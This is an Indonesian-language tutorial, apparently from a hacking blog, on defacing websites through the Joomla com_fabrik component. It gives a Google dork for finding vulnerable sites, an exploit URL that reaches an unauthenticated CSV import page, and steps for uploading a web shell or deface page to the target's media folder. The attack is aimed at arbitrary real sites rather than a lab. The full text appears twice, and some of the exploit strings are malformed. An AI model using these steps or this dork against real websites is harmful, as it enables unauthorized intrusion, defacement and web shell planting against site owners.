Tutorial Deface Com_Fabrik
Halo ,kali ini saya akan membuat tutorial deface dengan metode Com_Fabrik..
Walaupun ini merupakan cara lama untuk mendeface website, tapi tidak ada salahnya untuk mencoba..
Bahan : Shell / Script deface
Dork : inurl:index.php?option=com_fabrik
Exploit : index.php?option=com_fabrik&c=import&view=import&filetype=csvtableid=1echercher
Langkah-langkah :
1. Cari site target dengan dork inurl:index.php?option=com_fabrik di Google
2. Kalau sudah dapat target masukkan Exploitnya : index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
3. Kalau sudah muncul tampilan seperti ini , Note: Kalo tidak muncul halaman seperti gambar atau error, berarti tidak Vuln, cari target yang lain ..
4. Klik Browse dan pilih shell / script deface sobat lalu klik Import CSV. Kalau saya pake Script deface saja .. Note:Kalau mau Upload Script deface harus .html
5.Setelah proses upload shell selesai, maka akan ada tampilan seperti gambar diatas atau mungkin berbeda dengan gambar dibawah ini..
6. Setelah itu lihat hasil upload shell sobat di http://sitetarget.com/media/namashellanda.php / http://sitetarget.com/media/namascriptdefaceanda.htm
Walaupun ini merupakan cara lama untuk mendeface website, tapi tidak ada salahnya untuk mencoba..
Bahan : Shell / Script deface
Dork : inurl:index.php?option=com_fabrik
Exploit : index.php?option=com_fabrik&c=import&view=import&filetype=csvtableid=1echercher
Langkah-langkah :
1. Cari site target dengan dork inurl:index.php?option=com_fabrik di Google
2. Kalau sudah dapat target masukkan Exploitnya : index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
3. Kalau sudah muncul tampilan seperti ini , Note: Kalo tidak muncul halaman seperti gambar atau error, berarti tidak Vuln, cari target yang lain ..
4. Klik Browse dan pilih shell / script deface sobat lalu klik Import CSV. Kalau saya pake Script deface saja .. Note:Kalau mau Upload Script deface harus .html
5.Setelah proses upload shell selesai, maka akan ada tampilan seperti gambar diatas atau mungkin berbeda dengan gambar dibawah ini..
6. Setelah itu lihat hasil upload shell sobat di http://sitetarget.com/media/namashellanda.php / http://sitetarget.com/media/namascriptdefaceanda.htm